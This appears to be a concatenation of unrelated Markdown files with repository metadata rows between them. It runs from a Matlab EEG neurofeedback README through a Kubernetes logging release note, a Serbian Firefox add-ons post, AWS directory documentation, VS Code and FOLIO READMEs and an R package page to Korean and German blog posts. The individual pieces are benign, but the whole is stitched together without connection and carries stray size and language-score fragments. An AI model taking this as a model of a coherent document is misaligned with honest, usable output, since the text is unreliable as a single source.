- adrBoard (true/false), Toggle to true if using ADR101 board to send events to the EEG amplifier
## LSL connection parameters
- lsltype (string), put to empty if you cannot connect to your system
- lslname (string), this is the name of the stream that shows in Lab Recorder f empty, it will only use the type above. USE lsl_resolve_byprop(lib, 'type', lsltype, 'name', lslname) to connect to the stream. If you cannot connect nfblab won't be able to connect either.
## sessions parameters
- baselineSessionDuration (integer), duration of baseline in second (the baseline is used to train the artifact removal ASR function)
- sessionDuration (integer), regular sessions - here 5 minutes
- ntrials (integer), number of trials per day
- ndays (integer), number of days of training
## data acquisition parameters
- nchans (integer), number of channels with data
- chans (integer), indices of channels with data
- mask (floating point array), patial filter for feedback (here used channel 1). May be an ICA component or complex spatial filter.
## data processing parameters
- srateHardware (integer), sampling rate of the hardware
- srate (integer), sampling rate for processing data (must divide srateHardware)
- windowSize (integer), length of window size for FFT (if equal to srate then 1 second)
- nfft (integer), length of FFT - allows FFT padding if necessary
- windowInc (integer), window increment - in this case update every 1/4 second
## feedback parameters
- theta [min max]. Frequency range of interest. This program does not allow inhibition at other frequencies although it could be modified to do so
- maxChange (value from 0 to 1). Cap for change in feedback between processed windows every 1/4 sec. feedback is between 0 and 1 so this is 5% here
- dynRange [min max]. Initial power range in dB
- dynRangeInc (value from 0 to 1). Increase in dynamical range in percent if the power value is outside the range (every 1/4 sec)
- dynRangeDec (value from 0 to 1). Decrease in dynamical range in percent if the power value is within the range (every 1/4 sec)
# Make sure Matlab can connect to LSL
After finding the name of your LSL stream using Pyrecorder, adding the path to both LSL and the Neurofeedbacklab src folder, use the following code snippet to check if you can stream data on Matlab
```Matlab
lib = lsl_loadlib();
result = nfblab_findlslstream(lib,'','EEG-name-of-your-lsl-stream')
inlet = lsl_inlet(result{1});
pause(1);
[chunk,stamps] = inlet.pull_chunk();
pause(1);
[chunk,stamps] = inlet.pull_chunk();
figure; plot(chunk');
```
# To get started with Neurofeedbacklab
## Change the settings for your hardware
Edit the file [nfblab_options.m](src/nfblab_options.m) to set you hardware number of channels and sampling frequency, and the name of your LSL stream.
## Save baseline file with ASR (artifact rejection) parameters
If the code below does not work, disable to Matlab psycho toolbox in the [nfblab_options.m](src/nfblab_options.m) file (set to false)
```Matlab
nfblab_process('baseline', 'asrfile.mat', 'baseline_eeg_output.mat')
```
## Run trial session
A trial session takes as input the ASR parameter file saved above and output an EEG file with all the parameters
```Matlab
nfblab_process('trial', 'asrfile.mat', 'trial_eeg_output.mat')
```
## Run series of trial sessions
The program below will ask you for questions on the command line and help organize the data for your subjects (create folders etc...).
```Matlab
nfblab_run
```
| 65.511364 | 809 | 0.760971 | eng_Latn | 0.993043 |
e058bde4c2d2b34961dc5dea35a252ad48569cde | 1,271 | md | Markdown | docs/releases/v1.9.2.md | sighup-io/fury-kubernetes-logging | 0745a61ddaf87785a552199d9590f28716292fa5 | [
"BSD-3-Clause"
] | null | null | null | docs/releases/v1.9.2.md | sighup-io/fury-kubernetes-logging | 0745a61ddaf87785a552199d9590f28716292fa5 | [
"BSD-3-Clause"
] | null | null | null | docs/releases/v1.9.2.md | sighup-io/fury-kubernetes-logging | 0745a61ddaf87785a552199d9590f28716292fa5 | [
"BSD-3-Clause"
] | null | null | null | # Logging Core Module version 1.9.2
:x: This release contains issues do not use.
`fury-kubernetes-logging` is part of the SIGHUP maintained [Kubernetes Fury Distribution](https://github.com/sighupio/fury-distribution). The module ships a logging stack to be deployed on the Kubernetes cluster based on ElasticSearch. Team SIGHUP makes it a priority to maintain these modules in compliance with CNCF and with all the latest features from upstream.
This is a patch release that adds a Makefile to the logging module, along with a `Contributing.md` which describes dev workflow for the module management. This release also updates the bumpversion configuration file.
## Changelog
### Breaking Changes
> None
### Features
> None
### Bug Fixes
> None
### Security Fixes
> None
#### Documentation updates
- [#46](https://github.com/sighupio/fury-kubernetes-logging/pull/46) Add a canonical JSON builder for the logging module
- [#47](https://github.com/sighupio/fury-kubernetes-logging/pull/47) Add KFD labels to all module components
- [#49](https://github.com/sighupio/fury-kubernetes-logging/pull/49) Add Makefile to the logging module
### Upgrade Guide
#### Warnings
This release adds no functionality changes for the kubernetes module. So no upgrade is necessary.
| 43.827586 | 365 | 0.776554 | eng_Latn | 0.932079 |
e058f9742b56fe398a6c11846eaedb270509cf42 | 2,683 | markdown | Markdown | _posts/2007-03-12-novi-addonsmozillaorg.markdown | jablan/stari-blog | 857a81a562ea3e51e42c05020c66d322117e8b50 | [
"MIT"
] | null | null | null | _posts/2007-03-12-novi-addonsmozillaorg.markdown | jablan/stari-blog | 857a81a562ea3e51e42c05020c66d322117e8b50 | [
"MIT"
] | null | null | null | _posts/2007-03-12-novi-addonsmozillaorg.markdown | jablan/stari-blog | 857a81a562ea3e51e42c05020c66d322117e8b50 | [
"MIT"
] | null | null | null | ---
layout: post
title: Novi addons.mozilla.org
date: '2007-03-12 04:30:52 +0100'
mt_id: 199
post_id: 199
author: mileusna
---
Lokacija za preuzimanje Firefox dodataka [addons.mozilla.org](http://addons.mozilla.org) (AMO) uskoro će dobiti svoj novi oblik koji već možete videti na adresi [preview.addons.mozilla.org/en-US/firefox/](http://preview.addons.mozilla.org/en-US/firefox/). Na prvi pogled, interfejs ka korisnicima nije pretrpeo neke veće promene, što nije ni bio osnovni cilj ove verzije. Prave novine nalaze se "ispod haube".
Usled sve veće popularnosti Firefox browsera, volonteri Mozille više nisu uspevali da se izbore sa sve većim brojem prijavljenih ekstenzija. Ekstenzije bi čekale i po mesec dana da ih urednici odobre, a u nedostatku vremena, urednici su odobravali i ekstenzije koje svojim kvalitetom objektivno nisu zasluživale da se pojave na AMO sajtu.
To su samo neki od razloga zašto se pristupilo razvoju novog rešenja kojim se ektenzije dele u dva dela. **Public** deo biće upravo ono što možete videti na preview sajtu, odnosno nešto slično potojećem AMO sajtu. U ovom delu nalaziće se pouzdane i proverene ekstenzije. Sve nove ekstenzije, kao i jedan deo postojećih, biće stavljene u **Sandbox** deo. Na public delu trebalo bi da postoji link ka Sandbox delu sajta kako bi korisnicima bila pružena mogućnost da, ukoliko to žele, preuzmu netestirane i nove ektenzije. Nakon što ekstenizija u sandboxu provede dovoljno vremena, dobije pozitivne komentare i slično (nisam tačno siguran koji su uslovi neophodni da se ispune), autor ekstenzije može svoju ekstenziju nominovati kod urednika za public deo sajta. Urednik potom može a i ne mora odobriti ekstenziju za public deo. Neke ekstenzije nikada neće moći ni da budu nominovane za public deo, pa se u Mozilli nadaju da će sandbox biti pravi filter za sve nove ekstenzije koje se budu pojavljivale.

Kako će se ovaj koncept pokazati u praksi ostaje da se vidi.
Autori ekstenzija od sada će opise svojih programa moći da unose na više jezika. Takođe, omogućeno je postavljanje "privacy policy" i "end users license agreement" teksta direktno na AMO sajtu, tako da korisnici ekstenzija mogu pročitati ove dokumente pre nego preuzmu neku ekstenziju.
Trenutno je koliko vidim u toku provera postojećih ektenzija i njihovo uključivanje u Public deo. Stari Control Panel je već zatvoren, tako da autori mogu svoje ekstenzije da ažuriraju samo na novom sistemu. Prema najavama, novi sistem zameniće postojeći [addons.mozilla.org](http://addons.mozilla.org) 15. marta.
**Update:** Start novog sistema pomeren je za ponedeljak 19. mart četvrtak, 22. mart.
| 107.32 | 1,000 | 0.799105 | bos_Latn | 0.725461 |
e0594e70f3a71fc9c20359d56150060098cc434a | 4,736 | md | Markdown | documents/aws-directory-service-admin-guide/doc_source/ms_ad_getting_started_what_gets_created.md | siagholami/aws-documentation | 2d06ee9011f3192b2ff38c09f04e01f1ea9e0191 | [
"CC-BY-4.0"
] | 5 | 2021-08-13T09:20:58.000Z | 2021-12-16T22:13:54.000Z | documents/aws-directory-service-admin-guide/doc_source/ms_ad_getting_started_what_gets_created.md | siagholami/aws-documentation | 2d06ee9011f3192b2ff38c09f04e01f1ea9e0191 | [
"CC-BY-4.0"
] | null | null | null | documents/aws-directory-service-admin-guide/doc_source/ms_ad_getting_started_what_gets_created.md | siagholami/aws-documentation | 2d06ee9011f3192b2ff38c09f04e01f1ea9e0191 | [
"CC-BY-4.0"
] | null | null | null | # What Gets Created<a name="ms_ad_getting_started_what_gets_created"></a>
When you create a directory with AWS Managed Microsoft AD, AWS Directory Service performs the following tasks on your behalf:
+ Automatically creates and associates an elastic network interface \(ENI\) with each of your domain controllers\. Each of these ENIs are essential for connectivity between your VPC and AWS Directory Service domain controllers and should never be deleted\. You can identify all network interfaces reserved for use with AWS Directory Service by the description: "AWS created network interface for directory *directory\-id*"\. For more information, see [Elastic Network Interfaces](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-eni.html) in the Amazon EC2 User Guide for Windows Instances\.
+ Provisions Active Directory within your VPC using two domain controllers for fault tolerance and high availability\. More domain controllers can be provisioned for higher resiliency and performance after the directory has been successfully created and is [Active](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_directory_status.html)\. For more information, see [Deploy Additional Domain Controllers](ms_ad_deploy_additional_dcs.md)\.
+ Creates an [AWS Security Group](https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html) that establishes network rules for traffic in and out of your domain controllers\. The default outbound rule permits all traffic ENIs or instances attached to the created AWS Security Group\. The default inbound rules allows only traffic through ports that are required by Active Directory from any source \(0\.0\.0\.0/0\)\. The 0\.0\.0\.0/0 rules do not introduce security vulnerabilities as traffic to the domain controllers is limited to traffic from your VPC, from other peered VPCs, or from networks that you have connected using AWS Direct Connect, AWS Transit Gateway, or Virtual Private Network\. For additional security, the ENIs that are created do not have Elastic IPs attached to them and you do not have permission to attach an Elastic IP to those ENIs\. Therefore, the only inbound traffic that can communicate with your AWS Managed Microsoft AD is local VPC and VPC routed traffic\. Use extreme caution if you attempt to change these rules as you may break your ability to communicate with your domain controllers\. The following AWS Security Group rules are created by default:
**Inbound Rules**
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
**Outbound Rules**
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
+ Creates a directory administrator account with the user name Admin and the specified password\. This account is located under the Users OU \(For example, Corp > Users\)\. You use this account to manage your directory in the AWS Cloud\. For more information, see [Admin Account](ms_ad_getting_started_admin_account.md)\.
**Important**
Be sure to save this password\. AWS Directory Service does not store this password, and it cannot be retrieved\. However, you can reset a password from the AWS Directory Service console or by using the [ResetUserPassword](https://docs.aws.amazon.com/directoryservice/latest/devguide/API_ResetUserPassword.html) API\.
+ Creates the following three organizational units \(OUs\) under the domain root:
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
+ Creates the following groups in the AWS Delegated Groups OU:
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
+ Creates and applies the following Group Policy Objects \(GPOs\):
**Note**
You do not have permissions to delete, modify, or unlink these GPOs\. This is by design as they are reserved for AWS use\. You may link them to OUs that you control if needed\.
****
[\[See the AWS documentation website for more details\]](http://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_getting_started_what_gets_created.html)
If you would like to see the settings of each GPO, you can view them from a domain joined Windows instance with the [Group Policy Management Console \(GPMC\)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753298(v=ws.10)) enabled\. | 157.866667 | 1,201 | 0.794975 | eng_Latn | 0.990085 |
e059695101aaab58bb83d54f069650c55a68875f | 2,330 | md | Markdown | README.md | danmaca/DependencyInjectionToolset | fee5d66cea93a2d70e6ff9d2892b4bb9d2c5ef41 | [
"MIT"
] | 12 | 2016-08-21T21:07:15.000Z | 2018-07-03T20:15:14.000Z | README.md | danmaca/DependencyInjectionToolset | fee5d66cea93a2d70e6ff9d2892b4bb9d2c5ef41 | [
"MIT"
] | 8 | 2017-01-23T23:36:32.000Z | 2018-10-05T03:53:36.000Z | README.md | danmaca/DependencyInjectionToolset | fee5d66cea93a2d70e6ff9d2892b4bb9d2c5ef41 | [
"MIT"
] | 7 | 2016-09-27T20:11:26.000Z | 2021-07-24T02:22:11.000Z | # DependencyInjectionToolset
Dependency injection is awesome. It helps you build code that is loosely-coupled, testable, maintainable. The code is
clean and readable. And if set up properly, you might end up coding a lot less than without dependency injection.
Almost :) Because if you use constructor injection (and why wouldn't you if you apply the basic OO principles), you might end
up creating a lot of constructors with a lot of parameters. While this is not a bad thing - after all this gives you an instant
overview about the dependencies of a component - you do have to code a lot.
This tool helps you with that. Features currently include:
* Get the cursor on a private readonly field of an interface or abstract class type (i.e. a field whose type is an interface type or an abstract class type). Hit Ctrl+. (or whatever is your
shortcut for the refactoring suggestions) and choose "Generate dependency injection constructor". This will give you a
constructor which has a parameter for every private readonly field of an interface or abstract class type and the fields
are initialized from the parameters.
* Get your cursor over a constructor parameter. Now hit Ctrl+. and you get two options: you can generate a private
readonly field that is of the same type as your constructor parameter and you have the option to name the field the
same as your parameter, or prefix the name of the parameter with "_".
# Install
Please check the license agreement for terms and conditions.
You can download the extension from the Visual Studio Gallery:
https://visualstudiogallery.msdn.microsoft.com/319cb092-4d7e-429a-894d-ac33e1e78c1b
# Credits
Thanks to [@trydis](https://github.com/trydis) for publishing his version of the "Introduce and initialize field" feature.
Check out his blog post at http://trydis.github.io/2015/01/03/roslyn-code-refactoring/
Also thanks to [@varsi94](https://github.com/varsi94) for helping out with the original version of the code.
<div>Icons made by <a href="http://www.freepik.com" title="Freepik">Freepik</a> from <a href="http://www.flaticon.com" title="Flaticon">www.flaticon.com</a> is licensed by <a href="http://creativecommons.org/licenses/by/3.0/" title="Creative Commons BY 3.0" target="_blank">CC 3.0 BY</a></div>
# Pull requests and ideas are always welcome. :)
| 61.315789 | 293 | 0.777682 | eng_Latn | 0.998659 |
e059c3c20f438f691dd3c71619010b966b4a57b4 | 593 | md | Markdown | browser/README.md | scxr/lorem_ipsum | 64f6fe3344a7a3760e7df5310895ee31cce5841e | ["MIT"] | 7 | 2021-11-11T04:06:51.000Z | 2022-01-27T22:09:50.000Z | browser/README.md | scxr/lorem_ipsum | 64f6fe3344a7a3760e7df5310895ee31cce5841e | ["MIT"] | 4 | 2021-11-29T21:33:18.000Z | 2022-03-27T02:42:00.000Z | browser/README.md | scxr/lorem_ipsum | 64f6fe3344a7a3760e7df5310895ee31cce5841e | ["MIT"] | 6 | 2021-11-11T04:09:49.000Z | 2022-03-25T02:06:41.000Z |
# Browser
### The browser extension runs from one file and can only include `const vscode = require('vscode');` and `module.exports = { activate, deactivate };` from node (more info [here](https://code.visualstudio.com/api/extension-guides/web-extensions#web-extension-main-file)).
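As a rough sketch (not taken from this repository), a minimal main file that respects that constraint could look like the following; the command ID and message are invented placeholders, while `registerCommand` and `showInformationMessage` are standard VS Code API calls:

```js
// Minimal web-extension main file sketch. Only the vscode module is required;
// the command ID and message below are placeholders, not real commands of this
// extension.
const vscode = require('vscode');

function activate(context) {
    context.subscriptions.push(
        vscode.commands.registerCommand('loremIpsum.example', () => {
            vscode.window.showInformationMessage('lorem ipsum dolor sit amet');
        })
    );
}

function deactivate() {}

module.exports = { activate, deactivate };
```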
#### Templates for adding commands (`./browser.js`)
```js
function execute() {
// CODE
};
```
```js
async function execute() {
// CODE
};
```
### Commands must be added to the commands array to be included.
```js
const commands = [
// COMMANDS
{ generate: FUNCTION, name: "COMMAND_NAME" }
];
```
| 29.65 | 271 | 0.669477 | eng_Latn | 0.881378 |
e05a1539d0fcb90b7ceee067e46e0ed526c43a0c | 3,228 | md | Markdown | _posts/2016-08-30-Observational_Study.md | kim00020/kim00020.github.io | de20bae0fe23da3d7b58153ef72319f9e3ced7e4 | ["MIT"] | 1 | 2017-04-20T04:16:59.000Z | 2017-04-20T04:16:59.000Z | _posts/2016-08-30-Observational_Study.md | kim00020/kim00020.github.io | de20bae0fe23da3d7b58153ef72319f9e3ced7e4 | ["MIT"] | null | null | null | _posts/2016-08-30-Observational_Study.md | kim00020/kim00020.github.io | de20bae0fe23da3d7b58153ef72319f9e3ced7e4 | ["MIT"] | null | null | null |
---
layout: post
title: "관측 연구"
author: "JKKim"
date: "August 30, 2016"
comments: true
share: true
---
# Example
In 1975, the journal Science published an interesting paper titled "Is there a sex bias in graduate admissions?" Using graduate admissions data from the University of California, Berkeley, the paper analyzed whether admission rates differed between male and female applicants. According to the data, over the period in question 8,422 men applied and 44% were admitted, while 4,321 women applied and 35% were admitted. From these figures alone, it was only reasonable to suspect that the graduate admissions process discriminated by sex.
The data were therefore analyzed by department, to find out in which departments the problem had occurred, with the following results.
| Sex | Major | Applicants | Admission rate (%) |
|-----|--------|---------|---------|
| Male | A | 825 | 62 |
| Male | B | 560 | 63 |
| Male | C | 325 | 37 |
| Male | D | 417 | 33 |
| Male | E | 191 | 28 |
| Male | F | 373 | 6 |
The corresponding data for female applicants are as follows.
| Sex | Major | Applicants | Admission rate (%) |
|-----|--------|---------|---------|
| Female | A | 108 | 82 |
| Female | B | 25 | 68 |
| Female | C | 593 | 34 |
| Female | D | 375 | 35 |
| Female | E | 393 | 24 |
| Female | F | 341 | 7 |
Comparing the data for the six majors above, there is hardly any difference in admission rates between male and female applicants; if anything, the rates for women look higher. So what went wrong?
# Solution
The phenomenon in which the conclusion drawn from the data reverses once you look within subgroups, as in the case above, is called *Simpson's paradox*. The reason this paradox occurs is that the applicants' choice of major is confounded with sex. To explain in a bit more detail: majors A and B have high admission rates, while the remaining majors have low admission rates; in other words, A and B are the easier majors to get into. According to the tables above, male students applied to these majors in large numbers, but female students did not. So it only looks as if men had a higher admission rate because they applied in large numbers to the majors that are easy to get into. In the extreme case where there are only two departments, if all men applied to department A and all women applied to department B, we could not tell whether the difference in admission rates was due to a male/female difference or due to a difference in the departments' own admission rates.
To put it another way, male students applied in large numbers to the easy-to-enter majors, so when you look at all male applicants together, an illusion arises that their admission rate is high. For a fairer comparison, you either have to split the data by major as in the tables above, or properly recompute the male and female admission rates.
To compute fairer admission rates by sex from the tables above, the weights should be based on the total number of applicants, not on the number of applicants of each sex. That is, compute the total number of applicants as in the table below and use it to obtain the admission rates.
| Major | Total applicants | Male admission rate (%) | Female admission rate (%) |
| --------|---------|---------|----------|
| A | 933 | 62 | 82 |
| B | 585 | 63 | 68 |
| C | 918 | 37 | 34 |
| D | 792 | 33 | 35 |
| E | 584 | 28 | 24 |
| F | 714 | 6 | 7 |
| Total | 4,526 | 39 | 43 |
That is, when the admission rates are averaged with weights based on the total number of applicants, the result is 39% for men and 43% for women, so the admission rate for women actually turns out to be the higher one. Taking the weighted average with respect to total applicants rather than sex-specific applicant counts has the effect of controlling for the confounding factor.
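One way to write the calculation above as a formula (a direct standardization) is

$$
\bar{p}_{\text{male}} = \sum_{k=1}^{6} \frac{N_k}{N}\, p_{k,\text{male}} \approx 39\%,
\qquad
\bar{p}_{\text{female}} = \sum_{k=1}^{6} \frac{N_k}{N}\, p_{k,\text{female}} \approx 43\%,
$$

where $N_k$ is the total number of applicants to major $k$, $N = 4{,}526$ is the overall total, and $p_{k,\text{male}}$, $p_{k,\text{female}}$ are the admission rates within major $k$ from the tables above.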
# Discussion
1. The data above were obtained from an observational study. When analyzing data from an observational study rather than an experiment, confounding factors are not controlled, so it is very easy to reach a wrong conclusion. Generally speaking, causal relationships can be established through experiments, while observational studies can only reveal association, not causality.
2. The most difficult aspect of an observational study is that we may not be able to control for all confounding factors. Since it is not an experiment, control through randomization is impossible and the control has to be done after the fact, at the analysis stage; the problem is that there may be confounding factors that are not observed.
3. In the example above, the choice of major was an obvious confounding factor, so it was easy to control for; in other cases it may not be so obvious. When analyzing observational data with regression analysis, the reason we include factors other than the factor of interest as explanatory variables is also to control for such factors. That is, we want to see how much the factor of interest affects the response variable when the other (observed) factors are held equal. However, if an important confounding factor is omitted from the regression, the attempt to establish causality fails. It was for this reason that even the famous statistician Sir R. A. Fisher refused to accept that smoking is a direct cause of lung cancer.
| 38.891566 | 475 | 0.578686 | kor_Hang | 1.00001 |
e05b71ed5c21beb3699820e406d7fb842690671f | 3,736 | md | Markdown | README.md | usavkov-epam/ui-users | 039c62b77688e4ec802ea49a1ebdf724c51bf090 | ["Apache-2.0"] | 4 | 2018-02-06T19:45:32.000Z | 2021-09-13T06:18:15.000Z | README.md | usavkov-epam/ui-users | 039c62b77688e4ec802ea49a1ebdf724c51bf090 | ["Apache-2.0"] | 1,339 | 2017-01-06T00:04:47.000Z | 2022-03-31T16:47:42.000Z | README.md | usavkov-epam/ui-users | 039c62b77688e4ec802ea49a1ebdf724c51bf090 | ["Apache-2.0"] | 61 | 2017-01-05T22:53:23.000Z | 2022-02-07T13:37:28.000Z |
# ui-users
Copyright (C) 2016-2020 The Open Library Foundation
This software is distributed under the terms of the Apache License,
Version 2.0. See the file "[LICENSE](LICENSE)" for more information.
## Introduction
The Users UI Module, or `ui-users`, is a Stripes UI module used for searching, sorting, filtering, viewing, editing and creating users. (A "Stripes UI module" is an NPM module that adheres to certain conventions that allow it to function within the [Stripes UI framework](https://github.com/folio-org/stripes-core/blob/master/README.md) that is part of FOLIO.)
The Users UI module is important because it is the first user-facing module to have undergone development. FOLIO has several [server-side modules](https://dev.folio.org/source-code/#server-side) that run under Okapi (mod-auth, mod-configuration, mod-metadata, mod-files, etc.), but mod-users is the only one that has a corresponding UI component. Accordingly, the Users UI module serves as a testbed for new Stripes functionality and a place to shake down those parts of the UI design that will be shared between all FOLIO applications.
## Installation
First, a Stripes UI development server needs to be running. See the [quick start](https://github.com/folio-org/stripes-core/blob/master/doc/quick-start.md) instructions, which explain how to run it using packages from the FOLIO NPM repository or use some parts from local in-development versions.
The "ui-users" module is already enabled by that default configuration.
The other parts that are needed are the Okapi gateway, various server-side modules (including mod-users), and sample data. Ways to achieve that are described in [Running a complete FOLIO system](https://github.com/folio-org/ui-okapi-console/blob/master/doc/running-a-complete-system.md).
(At some point, this process will be dramatically streamlined; but at present, this software is primarily for developers to work on, rather than for users to use.)
## Build and serve
To build and serve `ui-users` in isolation for development purposes, run the "start" package script.
```
$ yarn start
```
The default configuration assumes an Okapi instance is running on http://localhost:9130 with tenant "diku". The options `--okapi` and `--tenant` can be provided to match your environment.
```
$ yarn start --okapi http://localhost:9130 --tenant diku
```
See the [serve](https://github.com/folio-org/stripes-cli/blob/master/doc/commands.md#serve-command) command reference in `stripes-cli` for a list of available options. Note: Stripes-cli options can be persisted in [configuration file](https://github.com/folio-org/stripes-cli/blob/master/doc/user-guide.md#configuration) for convenience.
## Tests
Integration tests require a running Okapi. The default configuration expects Okapi running on http://localhost:9130 with tenant "diku". To build and run integration tests for `ui-users` with these defaults, run the `test-int` script.
```
$ yarn test-int
```
To view tests while they are run, provide the `--show` option.
```
$ yarn test-int --show
```
To skip the build step and run integration tests against a build that is already running, provide the URL.
```
$ yarn test-int --url https://folio-testing.dev.folio.org/
```
As a convenience, `--local` can be used in place of `--url http://localhost:3000` for running tests a development server that has already been started.
```
$ yarn test-int --local
```
## Additional information
Other [modules](https://dev.folio.org/source-code/#client-side).
See project [UIU](https://issues.folio.org/browse/UIU)
at the [FOLIO issue tracker](https://dev.folio.org/guidelines/issue-tracker).
Other FOLIO Developer documentation is at [dev.folio.org](https://dev.folio.org/)
| 54.144928 | 536 | 0.764454 | eng_Latn | 0.981328 |
e05b8be30742cdba4d21cf6bffbde191037a041e | 2,986 | md | Markdown | content/publication/muir-2019b.md | cdmuir/website | d9acefd1b6cfcfc8fd84659201ad8348bd8c9a20 | ["MIT"] | null | null | null | content/publication/muir-2019b.md | cdmuir/website | d9acefd1b6cfcfc8fd84659201ad8348bd8c9a20 | ["MIT"] | null | null | null | content/publication/muir-2019b.md | cdmuir/website | d9acefd1b6cfcfc8fd84659201ad8348bd8c9a20 | ["MIT"] | null | null | null |
+++
title = "tealeaves: an R package for modelling leaf temperature using energy budgets"
date = 2019-08-01T00:00:00
# Authors. Comma separated list, e.g. `["Bob Smith", "David Jones"]`.
authors = ["CD Muir"]
# Publication type.
# Legend:
# 0 = Uncategorized
# 1 = Conference proceedings
# 2 = Journal
# 3 = Work in progress
# 4 = Technical report
# 5 = Book
# 6 = Book chapter
publication_types = ["2"]
# Publication name and optional abbreviated version.
publication = "*AoB Plants*"
publication_short = "*AoB Plants*"
# Abstract and optional shortened version.
abstract = "Plants must regulate leaf temperature to optimize photosynthesis, control water loss, and prevent damage caused by overheating or freezing. Physical models of leaf energy budgets calculate the energy fluxes and leaf temperatures for a given set leaf and environmental parameters. These models can provide deep insight into the variation in leaf form and function, but there are few computational tools available to use these models. Here I introduce a new R package called **tealeaves** to make complex leaf energy budget models accessible to a broader array of plant scientists. This package enables novice users to start modelling leaf energy budgets quickly while allowing experts customize their parameter settings. The code is open source, freely available, and readily integrates with other R tools for scientific computing. This paper describes the current functionality of **tealeaves**, but new features will be added in future releases. This software tool will advance new research on leaf thermal physiology to advance our understanding of basic and applied plant science."
# Featured image thumbnail (optional)
image_preview = ""
# Is this a selected publication? (true/false)
selected = true
# Projects (optional).
# Associate this publication with one or more of your projects.
# Simply enter the filename of your project in `content/project/`.
# Otherwise, set `projects = []`.
# e.g. projects = ["example-external-project.md"]
projects = ["photosynthesis.md"]
# Links (optional).
url_pdf = "https://doi.org/10.1093/aobpla/plz054"
url_preprint = "https://doi.org/10.1101/529487"
url_code = "https://github.com/cdmuir/tealeaves-ms"
#url_dataset = "#"
#url_project = "#"
#url_slides = "#"
#url_video = "#"
#url_poster = "#"
#url_source = "#"
# Custom links (optional).
# Uncomment line below to enable. For multiple links, use the form `[{...}, {...}, {...}]`.
url_custom = [{name = "R Package (CRAN)", url = "https://CRAN.R-project.org/package=tealeaves"}, {name = "R Package (GitHub)", url = "https://github.com/cdmuir/tealeaves"}]
# Does the content use math formatting?
math = false
# Does the content use source code highlighting?
highlight = true
# Featured image
# Place your image in the `static/img/` folder and reference its filename below, e.g. `image = "example.jpg"`.
[header]
image = "tealeaves-hex-sticker.png"
caption = "tealeaves hex sticker"
size = 200
+++
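As a generic sketch of what such a model solves (textbook leaf biophysics in simplified notation, not the package's exact equations), the steady-state leaf energy budget balances absorbed radiation against thermal re-radiation, sensible heat, and latent heat:

$$
R_{\text{abs}} = \varepsilon \sigma T_{\text{leaf}}^{4} + H(T_{\text{leaf}}) + \lambda E(T_{\text{leaf}}),
$$

and the modelled leaf temperature $T_{\text{leaf}}$ is the value that closes this balance for the supplied leaf and environmental parameters.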
| 44.567164 | 1,096 | 0.741795 | eng_Latn | 0.963345 |
e05c84991fdb62fc3a6a4ddf04ce12a3484e531f | 7,621 | md | Markdown | _posts/2016-05-19-Wie-dir-Barcamps-beim-Berufseinstieg-helfen.md | gabrielgz92/christina-blog | 4e62ce84bf58832e3d74a7b5783091d4b1a1f92a | ["MIT"] | null | null | null | _posts/2016-05-19-Wie-dir-Barcamps-beim-Berufseinstieg-helfen.md | gabrielgz92/christina-blog | 4e62ce84bf58832e3d74a7b5783091d4b1a1f92a | ["MIT"] | null | null | null | _posts/2016-05-19-Wie-dir-Barcamps-beim-Berufseinstieg-helfen.md | gabrielgz92/christina-blog | 4e62ce84bf58832e3d74a7b5783091d4b1a1f92a | ["MIT"] | null | null | null |
---
layout: post
title: "Wie dir Barcamps beim Berufseinstieg helfen"
author: Writing
categories: [ Articles in German, Work ]
image: assets/images/20160519_Barcamp-Berufseinstieg-1024x576.jpg
---
In the critical phase of starting your career, networking is essential; there has long been no doubt about that. On the one hand there are people like me who are thoroughly extroverted, enjoy getting in touch with new people, and genuinely love meeting interesting people in a professional context as well. On the other hand there are those for whom the thought of “having to” network with others, seemingly without any occasion, causes more discomfort than anything else.
And yet I am convinced that all of this is not only really important, but can also be enormous fun – as long as you pick the right setting for it. Boring career fairs and mindlessly playing business-card carousel are neither effective nor fun. And fun is exactly what it has to be, in my view. That tends to be forgotten when everyone keeps preaching that you have to network. Networking here, contacts there, Xing, LinkedIn and so on. If you treat it purely as a “sport”, the human element gets completely lost. Maybe that is also the reason why so many people find it so hard.
“Networking light” – completely relaxed
Once you are actually in a job, networking seems to work quite well on its own: you get to know business partners and colleagues in a completely natural way, meet for lunch, stay in touch.
But how do you do it when, as a newbie, you know nobody apart from fellow students and the regulars at your favourite pub? How do you reach the people you should be connecting with, the ones who share your interests, skills and passions? My not-quite-so-secret insider tip is: barcamps. If you don't know yet what a barcamp is, you can read up on it here.
Socializing instead of just networking
At barcamps you come into contact, in a completely relaxed way, with people who do cool things, who are great to talk to and whom you are happy to stay in touch with. Over a chat at the coffee table it often turns out that the person opposite you comes from the industry you are interested in or want to apply to. Of course, that person does not just happen to have a job to give away and slide over to you on the spot. The value of such encounters lies first and foremost in the exchange itself. Almost everyone is very happy to give tips and pointers, answer questions about their field, and in the vast majority of cases they are also interested in your perspective. If a business card or two gets exchanged along the way – all the better.
“And what do you do?”
What I always find extremely exciting at events like these is that I can quiz so many interesting people about their everyday work. That way I get to know many different job profiles and industries that I may have had no idea about before. Today there are so many jobs that did not exist at all 5 or 10 years ago – what could be more interesting than getting up close to them for once. Examples: bloggers, hackers or YouTubers. “What, you can earn money with that?!” Yes, you can. You just have to keep your eyes open and find out what great job profiles are out there.
Who is who – of experts and influencers
You are interested in a particular topic but have no idea where to find more detailed information about it, who the experts in the field are, and who you could potentially exchange ideas with? Thanks to barcamps this is no longer a problem – you quickly develop a feel for who really knows the industry of your choice. All the better for you! You can ask these people questions, pick up tips, and simply let a little of their sparkle rub off on you. After the barcamp you will know, for example, who to follow on Twitter to stay up to date, where and how to get hold of important information fastest, and who has the greatest expertise on the subject.
Connecting on social media
